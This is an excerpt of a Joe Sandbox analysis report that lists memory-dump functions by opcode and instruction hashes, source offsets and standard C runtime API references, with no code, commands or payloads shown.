            • String ID:
            • API String ID:
            • Opcode ID: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
            • Instruction ID: 8febe3b7f418dfa4e952c5578361de6aa4bc790f0323b97aa591ba6797ff477e
            • Opcode Fuzzy Hash: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
            • Instruction Fuzzy Hash: A342B071629F159BC3DAEF24C88055BF3E1FFC8218F048A1DD99997A50DB38F819CA91
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
            • Instruction ID: 9e175f2232b97e47f55fe82e0f05f9d099bdfa2a5f157a87c1fd4a6a1b44dc7d
            • Opcode Fuzzy Hash: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
            • Instruction Fuzzy Hash: F422E1B6504B028FCB14CF19D48055AF7E1FF88324F158A6EE9AAA7B10C730BA55CF81
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
            • Instruction ID: 05d082330c416e67c06a532964af8df8e1104b9eb0c871c855bdc4d54a32604c
            • Opcode Fuzzy Hash: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
            • Instruction Fuzzy Hash: CDF1B571344B058FC758DE5DDDA1B16F7E5AB88318F19C728919ACBB64E378F8068B80
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
            • Instruction ID: a64cc6f92c6b6fa5a4833a1a951b6f818ff9405b72c6ddda8e214af7f1df78c6
            • Opcode Fuzzy Hash: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
            • Instruction Fuzzy Hash: 6302A0711187058FC756EE0CD89036AF3E2FFC8309F19896CD69587B60E739A5198F82
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
            • Instruction ID: d008d6a8cc65d3609ebb895d48cf55a47713edd0e20ef03bcdff84269c49f4ae
            • Opcode Fuzzy Hash: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
            • Instruction Fuzzy Hash: 35C12873E2477906D764DEAE8C500AAB6E3AFC4220F9B477DDDD4A7242C9306D4A86C0
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
            • Instruction ID: 59e6509161ec3bd9c3ecf3905e65e7223ae54d73900dedb905656cb80170a9de
            • Opcode Fuzzy Hash: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
            • Instruction Fuzzy Hash: F6A1EB0A8090E4ABEF455A7E90B63FBAFE9CB27354E76719284D85B793C019120FDF50
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
            • Instruction ID: 47aeaaac46cadc797a226e4c34e547b17c64e59c69488b17d9ed8be6dbaff1af
            • Opcode Fuzzy Hash: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
            • Instruction Fuzzy Hash: 3DB14D72700B164BD728EEA9DC91796B3E3AB84326F8EC73C9046C6F55F2BCA4454680
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
            • Instruction ID: 1f8fbe7ba9cb3b8381ba107f8f96a30dffe4bf4974c33c07ae628e40e8639c02
            • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
            • Instruction Fuzzy Hash: 4FC18E75E002599FCF54CFA9C881ADEFBF1FF48204F24856AD919E7201E334AA558B94
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 9479a41546b8b9daa844b3f0f9bcf180ed8e63d922313bf96b91a02671daf30e
            • Instruction ID: 36e804d0ee4364e8342f699d3b9efb22c7ad17179c19836b830a43806f0d4baa
            • Opcode Fuzzy Hash: 9479a41546b8b9daa844b3f0f9bcf180ed8e63d922313bf96b91a02671daf30e
            • Instruction Fuzzy Hash: 20B193B0039FA686CBD3FF30951024BF7E0BFC524DF44194AD99986864EB3EE94E9215
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
            • Instruction ID: 1fcf9c901482e3bcd5351cee1d0be545ada2a89975e1bae92b33deb81af7a7aa
            • Opcode Fuzzy Hash: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
            • Instruction Fuzzy Hash: 559114739187BA06D7609EAE8C441B9B6E3AFC4210F9B077ADD9467282C9309E0697D0
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
            • Instruction ID: 21aa2ee2156cdb14bdd87fa45b1b4a47dc58b829e975794939f66583c327eeb6
            • Opcode Fuzzy Hash: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
            • Instruction Fuzzy Hash: 45B17AB5E002599FCB84CFE9C885ADEFBF0FF48210F64816AD915E7301E334AA558B94
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
            • Instruction ID: a9f0a864be28773e518ce4397aa6bcf880b67d554c02137c8ed2b26f06b11708
            • Opcode Fuzzy Hash: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
            • Instruction Fuzzy Hash: 5871D473A20F254B8714DEB98D94192F2F1EF88610B57C27CCE85D7B41EB31B95A96C0
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
            • Instruction ID: 16ed9272eeb0273003077931fa4eccec6cf412f29b4c515f657e3a0a3a5e76dd
            • Opcode Fuzzy Hash: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
            • Instruction Fuzzy Hash: DA8147B2A047019FC728CF19D88566AF7E1FFD8214F15892DE99E83B40D770F8558B92
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
            • Instruction ID: f395b139c867b075686e47566f0773c76a6166f9abd3c849023533423434210d
            • Opcode Fuzzy Hash: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
            • Instruction Fuzzy Hash: 7E71F522535B7A06EBC3DA3D881046BE7D0BE4910AB850956DC90F3181D72EDE4D77A4
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
            • Instruction ID: 23fcdd304da8d43c4f8a44d073617e59bbcd1cb7dd013e7ef3b01241795b6e51
            • Opcode Fuzzy Hash: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
            • Instruction Fuzzy Hash: 4B813875A10B669BDB54CF2AD8C045AFBF1FF08211B528A2AD8A683B40D334F565CF94
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
            • Instruction ID: d176ebd3a5a74ad8250464bf21fb3244b611c7ecbfa1724ebe960a67a265361f
            • Opcode Fuzzy Hash: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
            • Instruction Fuzzy Hash: CF61A3739046BB5BDB649E6DD8401A9B7A2BFC4320F5B8A75DC9823642C234EE11DBD0
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
            • Instruction ID: 23bbe81463bb4cfff95efd048660d7d0a248c5789b6b2e4b87506720b79cea41
            • Opcode Fuzzy Hash: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
            • Instruction Fuzzy Hash: C7617C37912A2B9BD761DF59D84527AB3A2EFC4360F6B8A358C0427642C734F9119BC4
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
            • Instruction ID: 7239b79c6b417040fbf928f905bae9d2b2d1f85275e5ffdd00bde906d8daee49
            • Opcode Fuzzy Hash: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
            • Instruction Fuzzy Hash: AB511C229257B945EFC3DA3D88504AEBBE0BE49106B460557DCD0B3181C72EDE4DB7E4
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
            • Instruction ID: f0ef39fb87bbcbabf7c087ccc32622f448b38fccad3fa450d398332d7bff4148
            • Opcode Fuzzy Hash: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
            • Instruction Fuzzy Hash: C4417C72E1872E47E34CFE169C9421AB39397C0250F4A8B3CCE5A973C1DA35B926C6C1
            Memory Dump Source
            • Source File: 00000000.00000002.2166960337.000000000214E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0214E000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_214e000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
            • Instruction ID: e02d3ebe38dd0d70bb12732b65416196512daf1af8ac4bebf9c3a110fa6cde91
            • Opcode Fuzzy Hash: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
            • Instruction Fuzzy Hash: 243169398462429FDB15CF70D890AB5BB70EF87225F1995ADC0898FA06D7266047C794
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
            • Instruction ID: 0490d86b4bce045c3c4fd50df124024f9d30e3e971c92668636fd4ef92e6cccb
            • Opcode Fuzzy Hash: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
            • Instruction Fuzzy Hash: 40315E7682976A4FC3D3FE61894010AF291FFC5118F4D4B6CCD505B690D73EAA4A9A82
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
            • Instruction ID: 1edc5ae7d1d45115dd4c26a98806ecde076720661bc97f911dd5153df2fdc15b
            • Opcode Fuzzy Hash: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
            • Instruction Fuzzy Hash: 573112306187419FDB41EF29D880A4BFBE1FFC9658F01D919F9889B261D730E985CA62
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
            • Instruction ID: 1c8bacf5bb82c19fd31f58afc9ee91b26a4c2e8545c30cc7f49a61b11eff74c0
            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
            • Instruction Fuzzy Hash: 7A113B77A2008B43D73886EDD4F46B6E3D5EBC632872C427AD04A4B6DED322D1619500
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
            • Instruction ID: 0998a237d52f7b84ae470d43f5086695a6fbd904f4e00711f2341052395eba14
            • Opcode Fuzzy Hash: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
            • Instruction Fuzzy Hash: D0113D0A8492C4BDCF424A7840E56EBEFA58E2B218F4A71DA88C44B743D01B150FE7A1
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
            • Instruction ID: 1583fca93265e7c22518b6c2698e61d696cebe46c7b50e3fd3b74367676c113a
            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
            • Instruction Fuzzy Hash: 671170723805009FDB54DE65DCD0EA673EAEB8C360B198155E909DB311D7B6E841C760
            Memory Dump Source
            • Source File: 00000000.00000002.2166960337.000000000214E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0214E000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_214e000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
            • Instruction ID: fe63eccf9df3a61017de91fcdccbeece38a9511a244fae6d42939c12b20c807b
            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
            • Instruction Fuzzy Hash: 74118EB2380100AFDB54DF55DC80FA673EAFB89720B198065ED08CB312DB76E842CB60
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
            • Instruction ID: 9051b20cda9c1b061a16742c5f1ed6452898c14464a9138b82d6c134d43230eb
            • Opcode Fuzzy Hash: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
            • Instruction Fuzzy Hash: 32012876810A629BD700DF3EC8C045AFBF1BF082117568B3ADCA083A41D334E662DBE4
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
            • String ID:
            • API String ID: 1442030790-0
            • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
            • Instruction ID: 5ecbf5b5424450b618bf2fe4065b4f90403c471f1f0f06449b6b9084e74b0db7
            • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
            • Instruction Fuzzy Hash: 75219F31124701AEE7317FE5D881E2F7FEAEF41B60B508029F489594EFEB629560CE51
            APIs
            • _memset.LIBCMT ref: 02203F51
              • Part of subcall function 02205BA8: __getptd_noexit.LIBCMT ref: 02205BA8
            • __gmtime64_s.LIBCMT ref: 02203FEA
            • __gmtime64_s.LIBCMT ref: 02204020
            • __gmtime64_s.LIBCMT ref: 0220403D
            • __allrem.LIBCMT ref: 02204093
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022040AF
            • __allrem.LIBCMT ref: 022040C6
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022040E4
            • __allrem.LIBCMT ref: 022040FB
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02204119
            • __invoke_watson.LIBCMT ref: 0220418A
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
            • String ID:
            • API String ID: 384356119-0
            • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
            • Instruction ID: 1532c6c194396a6529e40d69a23c9986a11f2a2f2ec67afc0e4bedf18f299e79
            • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
            • Instruction Fuzzy Hash: 6871DA71A20717ABD714EEB9CCC1B5AB3EABF10324F148169E914E66D9EB70D940CB90
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
            • String ID:
            • API String ID: 3432600739-0
            • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
            • Instruction ID: 294ccd2c7c5f2d01a9ad95f52dfaeec0882cfb562ae9083dcf6322effb2c4b9e
            • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
            • Instruction Fuzzy Hash: CC412732920309AFDB10AFE4D8C0BAE3BEABF04314F10842DEA14561DBCB799654DF51
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID: _free$ExitProcess___crt
            • String ID:
            • API String ID: 1022109855-0
            • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
            • Instruction ID: e5782622b2c7c14d15f77a6a87af8140a38c830d910738616b4ffc64b94fb6d4
            • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
            • Instruction Fuzzy Hash: 0131A231910351DFCB215FD4FCC084E7BB6EB14324705862AE9086B2EACBB459D9AE96
            APIs
            • std::exception::exception.LIBCMT ref: 0222FC1F
              • Part of subcall function 0221169C: std::exception::_Copy_str.LIBCMT ref: 022116B5
            • __CxxThrowException@8.LIBCMT ref: 0222FC34
            • std::exception::exception.LIBCMT ref: 0222FC4D
            • __CxxThrowException@8.LIBCMT ref: 0222FC62
            • std::regex_error::regex_error.LIBCPMT ref: 0222FC74
              • Part of subcall function 0222F914: std::exception::exception.LIBCMT ref: 0222F92E
            • __CxxThrowException@8.LIBCMT ref: 0222FC82
            • std::exception::exception.LIBCMT ref: 0222FC9B
            • __CxxThrowException@8.LIBCMT ref: 0222FCB0
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
            • String ID: leM
            • API String ID: 3569886845-2926266777
            • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
            • Instruction ID: 77bff90c2f2e5714d76928a0b9d4841b5f4d7c93bb6bb85915404d416227f48a
            • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
            • Instruction Fuzzy Hash: E111E979C0030DBBCF04FFE5D855CEEBBBDAA14344B408566AE1897648EB74A3588F94
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID: _free_malloc_wprintf$_sprintf
            • String ID:
            • API String ID: 3721157643-0
            • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
            • Instruction ID: 62323c2820b37f46f4f8175df8560c3120ef541ece2f6023bdcafca74a03793e
            • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
            • Instruction Fuzzy Hash: 651154B29106506AC722A2F40C55FFF3BED8F46302F0401AAFE8DE11C1EB185A119BB1
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID: Exception@8Throw$_memset$_malloc_sprintf
            • String ID:
            • API String ID: 65388428-0
            • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
            • Instruction ID: 11755d5e45a658c90d1c8cab0f79ef0297a504c28769860761a6d46e9ffd4c4d
            • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
            • Instruction Fuzzy Hash: 2D514971D40209FBEB11DBE5DC86FAFBBB9FB04744F100025FA09B6180EB746A018BA5
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID: Exception@8Throw$_memset_sprintf
            • String ID:
            • API String ID: 217217746-0
            • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
            • Instruction ID: f260aa5502567350601d509099d6982fb820055e022b4b1c053be4f1d318979d
            • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
            • Instruction Fuzzy Hash: 7E513F71D40209EAEF11DFE1DC46FEFBBB9AB04704F104129F916B6180D775AA05CBA5
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID: Exception@8Throw$_memset_sprintf
            • String ID:
            • API String ID: 217217746-0
            • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
            • Instruction ID: 80daf1be3251731c064ab7eb189366d1c07f1acca17f2a6f744deb5f660e5c7b
            • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
            • Instruction Fuzzy Hash: 7C514071D40249AADF21DFE1DC45FEFBBB9EF14704F104129FA16B6180E774AA068BA4
            APIs
            • __getptd.LIBCMT ref: 00403998
              • Part of subcall function 0040330E: __getptd_noexit.LIBCMT ref: 00403311
              • Part of subcall function 0040330E: __amsg_exit.LIBCMT ref: 0040331E
            • __amsg_exit.LIBCMT ref: 004039B8
